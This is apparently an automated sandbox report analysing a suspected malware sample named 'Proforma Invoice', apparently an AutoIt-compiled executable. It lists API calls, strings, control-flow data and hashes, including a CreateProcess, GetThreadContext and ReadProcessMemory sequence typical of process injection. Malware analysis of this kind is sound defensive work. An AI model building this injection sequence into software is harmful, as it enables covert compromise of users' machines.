                                                                                                control_flow_graph 1139 6a407c-6a4092 1140 6a4098-6a40ad call 6a7a16 1139->1140 1141 6a416f-6a4173 1139->1141 1144 6dd3c8-6dd3d7 LoadStringW 1140->1144 1145 6a40b3-6a40d3 call 6a7bcc 1140->1145 1148 6dd3e2-6dd3fa call 6a7b2e call 6a6fe3 1144->1148 1145->1148 1149 6a40d9-6a40dd 1145->1149 1158 6a40ed-6a416a call 6c2de0 call 6a454e call 6c2dbc Shell_NotifyIconW call 6a5904 1148->1158 1161 6dd400-6dd41e call 6a7cab call 6a6fe3 call 6a7cab 1148->1161 1151 6a40e3-6a40e8 call 6a7b2e 1149->1151 1152 6a4174-6a417d call 6a8047 1149->1152 1151->1158 1152->1158 1158->1141 1161->1158
                                                                                                APIs
                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006DD3D7
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • _memset.LIBCMT ref: 006A40FC
                                                                                                • _wcscpy.LIBCMT ref: 006A4150
                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006A4160
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                • String ID: Line:
                                                                                                • API String ID: 3942752672-1585850449
                                                                                                • Opcode ID: 84d2125b9be87bf60b3e2767f2b6f922f499cda40ac6dd65db4ecd442b2448b1
                                                                                                • Instruction ID: ad9e112e3ac3763aef8f15568c1a5f4c30e9c28455f2dc9f24997118a1c2cbbd
                                                                                                • Opcode Fuzzy Hash: 84d2125b9be87bf60b3e2767f2b6f922f499cda40ac6dd65db4ecd442b2448b1
                                                                                                • Instruction Fuzzy Hash: 6131D2B10083006FD360FB60DC46FDB77DAAF56310F10451EF58692191DFB4AA48CB9A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 1559183368-0
                                                                                                • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                • Instruction ID: 632eea913904a1e660e9f6ad15d7ee9caaa66baa63a0371bc68d278117a9aac6
                                                                                                • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                • Instruction Fuzzy Hash: C4518170A00B059BDB289E69DC84FBE77A7EF40321F64862DE826963D0D770ADD18B44
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 006A4E0F
                                                                                                • _free.LIBCMT ref: 006DE263
                                                                                                • _free.LIBCMT ref: 006DE2AA
                                                                                                  • Part of subcall function 006A6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006A6BAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                • API String ID: 2861923089-1757145024
                                                                                                • Opcode ID: dc4be14319e70c8a071541eaea3b3a7fdf3b7f3b788b528f6d1621f2828d2fb1
                                                                                                • Instruction ID: 46e3a7f39773f57026e2f2e96694f633f0f0b3f9f6cd78109177aeef38b52082
                                                                                                • Opcode Fuzzy Hash: dc4be14319e70c8a071541eaea3b3a7fdf3b7f3b788b528f6d1621f2828d2fb1
                                                                                                • Instruction Fuzzy Hash: CF915971D00219DFCF04EFA4CC919EDB7BABF15310B14442EE816AB2A1DB75AE15CB54
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006A35A1,SwapMouseButtons,00000004,?), ref: 006A35D4
                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006A35A1,SwapMouseButtons,00000004,?,?,?,?,006A2754), ref: 006A35F5
                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,006A35A1,SwapMouseButtons,00000004,?,?,?,?,006A2754), ref: 006A3617
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: Control Panel\Mouse
                                                                                                • API String ID: 3677997916-824357125
                                                                                                • Opcode ID: 74b94b5e6496f2c008f7332a8c7b2491595e4f077c37937332f6a2bc7c278baa
                                                                                                • Instruction ID: 18cabd61b01d4945fd39e605ad7bccf5de803e17b2ffd977bd4388cec5cf3467
                                                                                                • Opcode Fuzzy Hash: 74b94b5e6496f2c008f7332a8c7b2491595e4f077c37937332f6a2bc7c278baa
                                                                                                • Instruction Fuzzy Hash: CB114871910228BFDB209FA4DC40DEFB7B9EF05740F00A4AAF805D7310E2719E419B64
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ACD
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51AF1
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1769483837.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1e50000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                • Instruction ID: e76a5a2c55f7bacf68a0dd08715d4ff1aae805b643caebdbeaafc69dd5d117e2
                                                                                                • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                • Instruction Fuzzy Hash: 2E622C30A14258DBEB64CFA4C850BDEB772EF58300F1091A9D60DEB390E7799E81CB59
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4EE5: _fseek.LIBCMT ref: 006A4EFD
                                                                                                  • Part of subcall function 00709734: _wcscmp.LIBCMT ref: 00709824
                                                                                                  • Part of subcall function 00709734: _wcscmp.LIBCMT ref: 00709837
                                                                                                • _free.LIBCMT ref: 007096A2
                                                                                                • _free.LIBCMT ref: 007096A9
                                                                                                • _free.LIBCMT ref: 00709714
                                                                                                  • Part of subcall function 006C2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,006C9A24), ref: 006C2D69
                                                                                                  • Part of subcall function 006C2D55: GetLastError.KERNEL32(00000000,?,006C9A24), ref: 006C2D7B
                                                                                                • _free.LIBCMT ref: 0070971C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                • String ID:
                                                                                                • API String ID: 1552873950-0
                                                                                                • Opcode ID: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                • Instruction ID: 9d086f14fb7afe964586eb2f40604756c24fc509311c8cfbb01f654c5d4c2abc
                                                                                                • Opcode Fuzzy Hash: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                • Instruction Fuzzy Hash: 965142B1914218EFDF549F64CC85AAEBBBAEF88300F10459EF609A3241DB755D90CF58
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2782032738-0
                                                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                • Instruction ID: 982ef4a7bde1f787f440b10a859b38867b4e0a47ed5d292134a67e5aed48e30e
                                                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                • Instruction Fuzzy Hash: 5A41B134A016459BDB28CEA9C8A0FFA7BA7EF45360B24817DE81587680DF70DD418B54
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: AU3!P/s$EA06
                                                                                                • API String ID: 4104443479-3623764935
                                                                                                • Opcode ID: d05b2059ae66caeebfbc15caa581bb851a240441407b2aacf617e4e9de8e44f8
                                                                                                • Instruction ID: dc983efe7ec31ca6d0d643d09084b0e2af750ced3b436050127414eccc083fa0
                                                                                                • Opcode Fuzzy Hash: d05b2059ae66caeebfbc15caa581bb851a240441407b2aacf617e4e9de8e44f8
                                                                                                • Instruction Fuzzy Hash: ED415E31A041586BDF21BB648C527FE7BA3DFC7300F284479EC869B382DEA45D458BA1
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 006DEA39
                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 006DEA83
                                                                                                  • Part of subcall function 006A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A4743,?,?,006A37AE,?), ref: 006A4770
                                                                                                  • Part of subcall function 006C0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006C07B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                • String ID: X
                                                                                                • API String ID: 3777226403-3081909835
                                                                                                • Opcode ID: 392165ba739fc257cd4218611c83d252c1a0856196222605ebad99b9e13eb767
                                                                                                • Instruction ID: 533cfe1e82a3168a93229bf5ebdeca449a53b8bcab3a1c8b1e97e9ca05145038
                                                                                                • Opcode Fuzzy Hash: 392165ba739fc257cd4218611c83d252c1a0856196222605ebad99b9e13eb767
                                                                                                • Instruction Fuzzy Hash: 8A21C9719002489BCB51AF94CC45BEE7BFDAF49711F04405AE404BB341DFF859498FA5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock_memmove
                                                                                                • String ID: EA06
                                                                                                • API String ID: 1988441806-3962188686
                                                                                                • Opcode ID: a5678fc9805fb5669b86261a1a3c549bf8e2e98af30ab4ebd961db121257957e
                                                                                                • Instruction ID: d2e95fb719dc6d8dff0598a2d7e8f4fb25748d0080bf31bf0d2780c5715fdcef
                                                                                                • Opcode Fuzzy Hash: a5678fc9805fb5669b86261a1a3c549bf8e2e98af30ab4ebd961db121257957e
                                                                                                • Instruction Fuzzy Hash: 3301F971904218BEDB58CBA8CC16FFE7BF8DB15301F00429EF592D21C1E8B9E60887A0
                                                                                                APIs
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 007098F8
                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0070990F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Temp$FileNamePath
                                                                                                • String ID: aut
                                                                                                • API String ID: 3285503233-3010740371
                                                                                                • Opcode ID: e1ea0818d4cdeeb167aaecb4f9ecddf590328e6480e79b8b6eba840c5bdc0657
                                                                                                • Instruction ID: afa1cf992886b67d7bba566326d189966f7c9307f5e959bc4e3fe074acac7676
                                                                                                • Opcode Fuzzy Hash: e1ea0818d4cdeeb167aaecb4f9ecddf590328e6480e79b8b6eba840c5bdc0657
                                                                                                • Instruction Fuzzy Hash: 34D05E7954030DABDB60ABA0DC0EFDA777CE704701F0042B1FE54D11A1EAB5A5998BA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aa3d70124545276806378a4aea55a83140859c9d33f69cffd588be1a676ebd7b
                                                                                                • Instruction ID: 1a642bd10450fe11baf17b74b22a7b4df7a1a252161096daf6940e9e108b5a02
                                                                                                • Opcode Fuzzy Hash: aa3d70124545276806378a4aea55a83140859c9d33f69cffd588be1a676ebd7b
                                                                                                • Instruction Fuzzy Hash: FDF13671608300DFCB14DF68C485A6ABBE5FF89314F14892EF8999B291D734E945CF92
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 006A4370
                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006A4415
                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A4432
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_$_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1505330794-0
                                                                                                • Opcode ID: 68a3e2a8b2c52f28ed2fcb977a3ed36daa9de79bb96010a531d4858bf7c3e775
                                                                                                • Instruction ID: f693e9baf4b779d192c3cb6e115644c3f06606e5935358fa851e6f5c7db61221
                                                                                                • Opcode Fuzzy Hash: 68a3e2a8b2c52f28ed2fcb977a3ed36daa9de79bb96010a531d4858bf7c3e775
                                                                                                • Instruction Fuzzy Hash: 4D31AEB0504701CFC760EF24D88469BBBF8FB99308F00492EE58A82351EBB4A944CF96
                                                                                                APIs
                                                                                                • __FF_MSGBANNER.LIBCMT ref: 006C5733
                                                                                                  • Part of subcall function 006CA16B: __NMSG_WRITE.LIBCMT ref: 006CA192
                                                                                                  • Part of subcall function 006CA16B: __NMSG_WRITE.LIBCMT ref: 006CA19C
                                                                                                • __NMSG_WRITE.LIBCMT ref: 006C573A
                                                                                                  • Part of subcall function 006CA1C8: GetModuleFileNameW.KERNEL32(00000000,007633BA,00000104,?,00000001,00000000), ref: 006CA25A
                                                                                                  • Part of subcall function 006CA1C8: ___crtMessageBoxW.LIBCMT ref: 006CA308
                                                                                                  • Part of subcall function 006C309F: ___crtCorExitProcess.LIBCMT ref: 006C30A5
                                                                                                  • Part of subcall function 006C309F: ExitProcess.KERNEL32 ref: 006C30AE
                                                                                                  • Part of subcall function 006C8B28: __getptd_noexit.LIBCMT ref: 006C8B28
                                                                                                • RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,?,?,?,006C0DD3,?), ref: 006C575F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1372826849-0
                                                                                                • Opcode ID: c2576eea2f9b4822b7a072baee4295e362812ad6b0687433fcbd1c6e22c8b9fc
                                                                                                • Instruction ID: b3d103d363aecff5dbb981fee05772c0172cfdcf53922b7acfe23c069a2c33ed
                                                                                                • Opcode Fuzzy Hash: c2576eea2f9b4822b7a072baee4295e362812ad6b0687433fcbd1c6e22c8b9fc
                                                                                                • Instruction Fuzzy Hash: C301D231200B11DEDA602774AC46F7E734ADB42761F50002EF407AB281DFB4ACC18679
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00709548,?,?,?,?,?,00000004), ref: 007098BB
                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00709548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007098D1
                                                                                                • CloseHandle.KERNEL32(00000000,?,00709548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007098D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                • String ID:
                                                                                                • API String ID: 3397143404-0
                                                                                                • Opcode ID: ff2ebabbf91cb7a25e24c2df6b7943bbccee2bf6b65dccbb1de337b81329bc29
                                                                                                • Instruction ID: f0e2c7ee4b8d6fa5fb431912a5bcf9c2397746f663d42291d7175ed051e6909c
                                                                                                • Opcode Fuzzy Hash: ff2ebabbf91cb7a25e24c2df6b7943bbccee2bf6b65dccbb1de337b81329bc29
                                                                                                • Instruction Fuzzy Hash: 53E08632141218F7D7311B54EC0AFCA7F69AB06760F10C230FB14690E1C7B51522979C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00708D1B
                                                                                                  • Part of subcall function 006C2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,006C9A24), ref: 006C2D69
                                                                                                  • Part of subcall function 006C2D55: GetLastError.KERNEL32(00000000,?,006C9A24), ref: 006C2D7B
                                                                                                • _free.LIBCMT ref: 00708D2C
                                                                                                • _free.LIBCMT ref: 00708D3E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                • Instruction ID: 58757f1e6e15e11634bc1d5bfe0afa948775e9ee7bf428a30f55baf3e4a991ec
                                                                                                • Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                • Instruction Fuzzy Hash: E4E012E171160287CBA4A5B8A940FA333DDCF6C3527140B2DF84ED71C6CE68F842812C
